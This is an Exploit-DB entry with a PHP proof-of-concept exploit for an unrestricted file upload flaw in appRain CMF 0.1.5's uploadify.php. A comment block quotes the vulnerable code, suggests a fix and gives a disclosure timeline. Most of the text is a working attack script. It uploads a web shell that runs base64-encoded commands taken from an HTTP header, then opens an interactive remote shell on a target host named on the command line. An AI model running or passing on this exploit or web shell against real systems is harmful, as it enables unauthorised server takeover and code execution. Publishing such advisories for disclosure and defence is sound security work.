appRain CMF 0.1.5 - 'Uploadify.php' Unrestricted Arbitrary File Upload

EDB-ID:

18392


Author:

EgiX

Type:

webapps


Platform:

PHP

Date:

2012-01-19


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

<?php

/*
    ---------------------------------------------------------------------
    appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit
    ---------------------------------------------------------------------
    
    author............: Egidio Romano aka EgiX
    mail..............: n0b0d13s[at]gmail[dot]com
    software link.....: http://www.apprain.com/
     
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] vulnerable code in /webroot/addons/uploadify/uploadify.php
    
    27.    if (!empty($_FILES)) {
    28.            $tempFile = $_FILES['Filedata']['tmp_name'];
    29.            //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    30.            $targetFile =  "uploads/" . $_FILES['Filedata']['name'];
    31.            
    32.            // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);
    33.            // $fileTypes  = str_replace(';','|',$fileTypes);
    34.            // $typesArray = split('\|',$fileTypes);
    35.            // $fileParts  = pathinfo($_FILES['Filedata']['name']);
    36.            
    37.            // if (in_array($fileParts['extension'],$typesArray)) {
    38.                    // Uncomment the following line if you want to make the directory if it doesn't exist
    39.                    // mkdir(str_replace('//','/',$targetPath), 0755, true);
    40.                    
    41.                    move_uploaded_file($tempFile,$targetFile);
    42.                    echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
    43.            // } else {
    44.            //      echo 'Invalid file type.';
    45.            // }
    46.    }
    
    Restricted access to  this script isn't properly realized,  so an attacker might  be able to upload
    arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.
    
    [-] Possible bug fix:
    
    include_once('../../../app.php');
    App::__Obj('appRain_Base_Core')->check_admin_login(); 
    
    add this lines of code at the beginning of the script
    
    [-] Disclosure timeline:
    
    [19/12/2011] - Vulnerability discovered
    [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135
    [20/12/2011] - Vendor response and fix suggested 
    [16/01/2012] - After four weeks still no fix released
    [19/01/2012] - Public disclosure
    
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("\n[-] No response from {$host}:80\n");
 
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+---------------------------------------------------------------+";
print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";
 
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /apprain-v015/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet  = "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
    
if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");

$packet  = "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
    
while(1)
{
    print "\napprain-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>